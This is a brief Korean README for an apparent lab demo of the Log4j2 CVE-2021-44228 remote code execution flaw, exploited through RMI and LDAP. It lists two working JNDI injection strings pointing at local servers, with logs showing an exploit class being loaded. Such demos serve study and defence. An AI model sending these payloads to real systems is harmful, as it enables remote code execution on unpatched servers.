
RMI 및 LDAP을 이용한 Apache Log4j2 CVE-2021-44228 RCE 데모
CVE-2021-44228을 활용하여 RMI와 LDAP 두 가지 방식으로 코드를 원격 주입하는 예제입니다.

Exploit class from RMI Server loaded
Hello, ${jndi:rmi://127.0.0.1:1099/exploit}
Exploit class from LDAP Server loaded
Hello, ${jndi:ldap://127.0.0.1:1389/org.mazhuang.ldap.Exploit}
RmiServer와 LdapServer 실행은 Python3에 의존합니다.